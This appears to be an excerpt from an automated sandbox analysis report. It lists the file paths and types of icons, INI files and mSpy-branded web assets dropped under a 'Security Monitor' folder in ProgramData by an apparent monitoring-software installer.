MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-2TRA1.tmp
Generic INItialization configuration [Zoom]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-NTLRI.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-6LNCU.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-DML6U.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-023FE.tmp
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-UIB0G.tmp
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-8VMRU.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-90G1A.tmp
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-DM7VE.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-EHG83.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-ENJMA.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-EOMK7.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-I8Q5V.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-TGDMF.tmp
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-DHNA5.tmp
HTML document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-1O11V.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-6P1D7.tmp
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-8VVPL.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-AETIL.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-GTEAT.tmp
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-HQ5K3.tmp
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-HQP5I.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-MTML6.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-NDCLE.tmp
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-OVOBQ.tmp
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-VDV7M.tmp
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
ASCII text
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-07K37.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-0B2U0.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-38H15.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4CQDQ.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5LGT6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-63FTM.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-66O2J.tmp
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-6OG7U.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7135Q.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7HRN7.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7N95R.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7ST0G.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8J0JN.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8JN9D.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9TJI2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-AHVHO.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-B4IQ8.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-C0J4H.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CF51J.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DBF37.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DQUUK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ELNCN.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EPNQ5.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EROC8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-H3K59.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-I0IV2.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KOOLK.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-LNHUS.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MP9QP.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-N31GE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-O07NB.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OFQD7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OTEOD.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PSVLI.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PUK8L.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QQ5EP.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-R183T.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-RMPPM.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-T356B.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-T69MP.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UL9VS.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V4PC2.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V5JDN.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-VQSO6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\myspace.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\odnoklassniki.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\qqzone.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\twitter.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\vkontakte.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\youtube.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\GMX.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Gmail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.RU.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Mail.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Outlook.Live.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yahoo Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\Yandex Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\facebook.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
